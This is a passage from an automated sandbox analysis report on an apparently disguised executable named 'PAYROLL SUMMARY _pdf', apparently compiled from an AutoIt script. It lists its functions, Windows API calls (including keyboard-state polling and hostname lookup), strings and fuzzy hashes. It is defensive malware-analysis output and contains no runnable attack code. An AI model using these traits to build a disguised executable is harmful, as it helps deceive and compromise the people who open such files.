Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 387f6c657a2e68aa647c8cc9b3e6bf3fc0ea3199d2f8da05bb10bc78233d6177
Instruction ID: be635a8e861d43781a312f600982207411cbfc1fa0fe1ef8dcff15b9c91f7b75
Opcode Fuzzy Hash: 387f6c657a2e68aa647c8cc9b3e6bf3fc0ea3199d2f8da05bb10bc78233d6177
Instruction Fuzzy Hash: A402B0351283419FCB24EF24C891AAFBBE5BF99314F04491DF886932A1DB30D969CF46

Function 002545DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002545F9
GetMenuItemCount.USER32(00316890), ref: 0028D7CD
GetMenuItemCount.USER32(00316890), ref: 0028D87D
GetCursorPos.USER32(?), ref: 0028D8C1
SetForegroundWindow.USER32(00000000), ref: 0028D8CA
TrackPopupMenuEx.USER32(00316890,00000000,?,00000000,00000000,00000000), ref: 0028D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0028D8E9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 0f2ef2d7c3ef523d8b3a571fb2b9a663667b86316d24a33bec36aa32d6f04561
Instruction ID: 9ef59abd1934033fc3f7a9520f8a9eba2750f2a6414674fe9830fc5219fc85ce
Opcode Fuzzy Hash: 0f2ef2d7c3ef523d8b3a571fb2b9a663667b86316d24a33bec36aa32d6f04561
Instruction Fuzzy Hash: 2C714934662206BEEB20AF14DC49FAAFF69FF05358F100216F925661D0C7B19C78DB94

Function 002C8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002C8BEC
CoInitialize.OLE32(00000000), ref: 002C8C19
CoUninitialize.OLE32 ref: 002C8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 002C8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 002C8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002E2C0C), ref: 002C8E84
CoGetObject.OLE32(?,00000000,002E2C0C,?), ref: 002C8EA7
SetErrorMode.KERNEL32(00000000), ref: 002C8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C8F3A
VariantClear.OLEAUT32(?), ref: 002C8F4A

Strings

,,., xrefs: 002C8BD6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,.
API String ID: 2395222682-737214711
Opcode ID: 19629521603088c3ae0ff31b346f27896a38450fa52ce0534014cec9b4853fa9
Instruction ID: 09ffbdab82ec37572f887b99dacbb52c2b0f0e611b046f90b79d7d5144d34ad0
Opcode Fuzzy Hash: 19629521603088c3ae0ff31b346f27896a38450fa52ce0534014cec9b4853fa9
Instruction Fuzzy Hash: 68C13371618305AFD700DF24C884E2AB7E9BF89348F008A2DF98A9B251DB71ED15CB52

Function 002D10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D0038,?,?), ref: 002D10BC

Strings

HKCU, xrefs: 002D11AC
HKU, xrefs: 002D11CE
HKEY_CURRENT_CONFIG, xrefs: 002D1179
HKEY_LOCAL_MACHINE, xrefs: 002D1125
HKLM, xrefs: 002D113A
HKEY_CLASSES_ROOT, xrefs: 002D114F
HKCR, xrefs: 002D1164
HKEY_USERS, xrefs: 002D11BD
HKCC, xrefs: 002D118A
HKEY_CURRENT_USER, xrefs: 002D119B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 3a9e7166603ea491fdf1b5d6d980b4f84fa5081ba7108aa9485bbd97e93d93d1
Instruction ID: 6e7662e2a9fd88abbe8b316e2d478210d4e91463b4477fef2b7ae516bc1bc092
Opcode Fuzzy Hash: 3a9e7166603ea491fdf1b5d6d980b4f84fa5081ba7108aa9485bbd97e93d93d1
Instruction Fuzzy Hash: BF416A3016125AEBCF25EF90D8A5AEB3724EF19300F108456FC955B792DB71AD3ACB60

Function 002B5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

Part of subcall function 00257A84: _memmove.LIBCMT ref: 00257B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002B55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002B55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002B560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002B561C

Strings

play PlayMe wait, xrefs: 002B5606
alias PlayMe, xrefs: 002B55AB
open , xrefs: 002B5581
close PlayMe, xrefs: 002B55E3, 002B5610
play PlayMe, xrefs: 002B5617
status PlayMe mode, xrefs: 002B55CD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: b03bf0602b98cdedc90bc2d8a72e29f49592cf379ba31b9e981c61cc7ddbaaea
Instruction ID: ad8b4aeb8d47ee673bc1f91f69f9eb8eeec8a9adf42660ff5d96306f26324110
Opcode Fuzzy Hash: b03bf0602b98cdedc90bc2d8a72e29f49592cf379ba31b9e981c61cc7ddbaaea
Instruction Fuzzy Hash: 721108209B166979D721F671EC5ADFFBB7CEF95B40F400459B801960C1DEB00D58C9A1

Function 002B48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002B490E
gethostname.WSOCK32(?,00000100), ref: 002B4928
gethostbyname.WSOCK32(?), ref: 002B4935
_wcscpy.LIBCMT ref: 002B495D
_memmove.LIBCMT ref: 002B4970
inet_ntoa.WSOCK32(?), ref: 002B497B
_strcat.LIBCMT ref: 002B4989
_wcscpy.LIBCMT ref: 002B49A0
WSACleanup.WSOCK32 ref: 002B49AE
_wcscpy.LIBCMT ref: 002B49BC

Strings

0.0.0.0, xrefs: 002B4957

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: eb8e31811009e333485c6430ad5195a4a8fdb049092695234a8e3c0af5e38537
Instruction ID: 2813da69e1212e0a4cd587610e670a4fa2d5e118a88e8717f27814b037f3a9d1
Opcode Fuzzy Hash: eb8e31811009e333485c6430ad5195a4a8fdb049092695234a8e3c0af5e38537
Instruction Fuzzy Hash: 3911D231924115ABDB24FB24AD4AEDB77AC9F01750F0481B6F40996092EFB09EA19A62

Function 002B5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 002B521C

Part of subcall function 00270719: timeGetTime.WINMM(?,7694B400,00260FF9), ref: 0027071D

Sleep.KERNEL32(0000000A), ref: 002B5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 002B526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002B528E
SetActiveWindow.USER32 ref: 002B52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002B52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 002B52DA
Sleep.KERNEL32(000000FA), ref: 002B52E5
IsWindow.USER32 ref: 002B52F1
EndDialog.USER32(00000000), ref: 002B5302

Strings

BUTTON, xrefs: 002B5280

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b497d08cf7ed30b8702c871f6fe9d3143b194f27cf7eb27bc71e456c04eea2c6
Instruction ID: d81dd3bfa7ac25ef83dc2a54d9ed38e47fe6ed22950ea2f1eeb7df78f8dde562
Opcode Fuzzy Hash: b497d08cf7ed30b8702c871f6fe9d3143b194f27cf7eb27bc71e456c04eea2c6
Instruction Fuzzy Hash: 53210470516705AFE7425F60FE8DBE53B6EEB093C6F088469F402852B1CBB19C248B65

Function 002BD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

CoInitialize.OLE32(00000000), ref: 002BD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002BD8E8
SHGetDesktopFolder.SHELL32(?), ref: 002BD8FC
CoCreateInstance.OLE32(002E2D7C,00000000,00000001,0030A89C,?), ref: 002BD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002BD9B7
CoTaskMemFree.OLE32(?,?), ref: 002BDA0F
_memset.LIBCMT ref: 002BDA4C
SHBrowseForFolderW.SHELL32(?), ref: 002BDA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002BDAAB
CoTaskMemFree.OLE32(00000000), ref: 002BDAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002BDAE9
CoUninitialize.OLE32(00000001,00000000), ref: 002BDAEB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 76a232133cf040507dcaa8a2c641a8f9420e85faf2c12fa8f327ffeed5e85794
Instruction ID: d164649bee3a0b43e5995cab723d7021322a6b1c0cd68db058d83f2970c121c0
Opcode Fuzzy Hash: 76a232133cf040507dcaa8a2c641a8f9420e85faf2c12fa8f327ffeed5e85794
Instruction Fuzzy Hash: 55B11975A10109AFDB04DFA4C888EAEBBB9EF48305B148469E90AEB251DB30ED55CF54

Function 002B052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 002B05A7
SetKeyboardState.USER32(?), ref: 002B0612
GetAsyncKeyState.USER32(000000A0), ref: 002B0632
GetKeyState.USER32(000000A0), ref: 002B0649
GetAsyncKeyState.USER32(000000A1), ref: 002B0678
GetKeyState.USER32(000000A1), ref: 002B0689
GetAsyncKeyState.USER32(00000011), ref: 002B06B5
GetKeyState.USER32(00000011), ref: 002B06C3
GetAsyncKeyState.USER32(00000012), ref: 002B06EC
GetKeyState.USER32(00000012), ref: 002B06FA
GetAsyncKeyState.USER32(0000005B), ref: 002B0723
GetKeyState.USER32(0000005B), ref: 002B0731

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: fc0a4a8eec429f9a03c5cb97456fa99d648e9ca7bad8c20e3d4c44cd01ef4c13
Instruction ID: 9ccb25d06aa19a034308cdc30d4bed959189d8675f85305dc7609bb7131be1b2
Opcode Fuzzy Hash: fc0a4a8eec429f9a03c5cb97456fa99d648e9ca7bad8c20e3d4c44cd01ef4c13
Instruction Fuzzy Hash: D2510A20A1478919FB36DFA084947EFFFB4AF013C0F48459AC5C2565C2DA64ABACCF65

Function 002AC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 002AC746
GetWindowRect.USER32(00000000,?), ref: 002AC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002AC7B6
GetDlgItem.USER32(?,00000002), ref: 002AC7C1
GetWindowRect.USER32(00000000,?), ref: 002AC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002AC827
GetDlgItem.USER32(?,000003E9), ref: 002AC835
GetWindowRect.USER32(00000000,?), ref: 002AC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002AC889
GetDlgItem.USER32(?,000003EA), ref: 002AC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002AC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 002AC8C1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
Instruction ID: 5711b7f6851562cc88b959f0d7bdb560873499f86bd68c1e61d51d1aff7ae833
Opcode Fuzzy Hash: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
Instruction Fuzzy Hash: CF513F71F10205AFDB18CF69DD89AAEBBBAFB89310F24812DF516D6690DB709D008B54

Function 0025201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002520D3
KillTimer.USER32(-00000001,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0025216E
DestroyAcceleratorTable.USER32(00000000), ref: 0028BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BF5A
DeleteObject.GDI32(00000000), ref: 0028BF6C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: eb57ce9a7d88cc8cb2a669337527c24c34b2004ce84840fc3f489dc48d3cfa94
Instruction ID: d6e1598f9604d78c2023fae2df7094822abb78304fba74bd795a3b6dd5cba9ec
Opcode Fuzzy Hash: eb57ce9a7d88cc8cb2a669337527c24c34b2004ce84840fc3f489dc48d3cfa94
Instruction Fuzzy Hash: D461BB34522601DFCB36AF14DD49B6AB7F1FB65312F10842DE942869E1C771ACA9CF88

Function 002521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC

GetSysColor.USER32(0000000F), ref: 002521D3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d2d57e836c1171c08f8d5acb7c765a66618b273c38cc60eb71867effcb5263a2
Instruction ID: f72b04e7435c6cf2af571cdf03f01e559b310aca90ee96ebb7d770e597e91daa
Opcode Fuzzy Hash: d2d57e836c1171c08f8d5acb7c765a66618b273c38cc60eb71867effcb5263a2
Instruction Fuzzy Hash: E041D535411101DFDB255F28EC88BB93765EB07332F688266FD6ACA1E2C7318C5ADB25

Function 002BAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,002DF910), ref: 002BAB76
GetDriveTypeW.KERNEL32(00000061,0030A620,00000061), ref: 002BAC40
_wcscpy.LIBCMT ref: 002BAC6A

Strings

cdrom, xrefs: 002BAB92
unknown, xrefs: 002BAC01
fixed, xrefs: 002BABBE
ramdisk, xrefs: 002BABEA
network, xrefs: 002BABD4
all, xrefs: 002BAB7C
removable, xrefs: 002BABA8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e1ec7ef7014314ceed250832e1698a7a85c8cc71c2953ca6c29eeaf16283cd80
Instruction ID: 74590baa046a09ce68a2127fa0372567fa92e541ff3a15734fdfe97e48df4b73
Opcode Fuzzy Hash: e1ec7ef7014314ceed250832e1698a7a85c8cc71c2953ca6c29eeaf16283cd80
Instruction Fuzzy Hash: 72519D301283029BC720EF14D891AAFB7A5FF95345F14882AF896572E2DB31DD69CA53

Function 002DC27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

Part of subcall function 00252344: GetCursorPos.USER32(?), ref: 00252357
Part of subcall function 00252344: ScreenToClient.USER32(003167B0,?), ref: 00252374
Part of subcall function 00252344: GetAsyncKeyState.USER32(00000001), ref: 00252399
Part of subcall function 00252344: GetAsyncKeyState.USER32(00000002), ref: 002523A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 002DC2E4
ImageList_EndDrag.COMCTL32 ref: 002DC2EA
ReleaseCapture.USER32 ref: 002DC2F0
SetWindowTextW.USER32(?,00000000), ref: 002DC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002DC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 002DC48F

Strings

pr1, xrefs: 002DC438
@GUI_DRAGFILE, xrefs: 002DC424
pr1, xrefs: 002DC3FD
@GUI_DROPID, xrefs: 002DC3E1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$pr1$pr1
API String ID: 1924731296-64955891
Opcode ID: 7073ef95e373e2f0c8d09ab014581efabf1ea949520acdc648dc8a5d9a8209b2
Instruction ID: 486fa7567af1564147d3237ff74519a35fea1cc3a3d81322e6416b878060972f
Opcode Fuzzy Hash: 7073ef95e373e2f0c8d09ab014581efabf1ea949520acdc648dc8a5d9a8209b2
Instruction Fuzzy Hash: 47519C30614305AFD705EF24C856FAA7BF5EB88311F10852EF9568B2E1CB709969CF52

Function 00259997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 002599C2
__swprintf.LIBCMT ref: 00259A0C
__i64tow.LIBCMT ref: 0028FA0F

Strings

True, xrefs: 0028F9D0
False, xrefs: 0028F9D7
0x%p, xrefs: 0028F9F1
%.15g, xrefs: 00259A06

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 3015b95aa64a098a0bf1f68c16485749f88a8c9bc818445d3c6cc782c4b87d87
Instruction ID: 6b0c98ed2799df193d612db7fc12e5100321e34cbc358c38515c36738192532c
Opcode Fuzzy Hash: 3015b95aa64a098a0bf1f68c16485749f88a8c9bc818445d3c6cc782c4b87d87
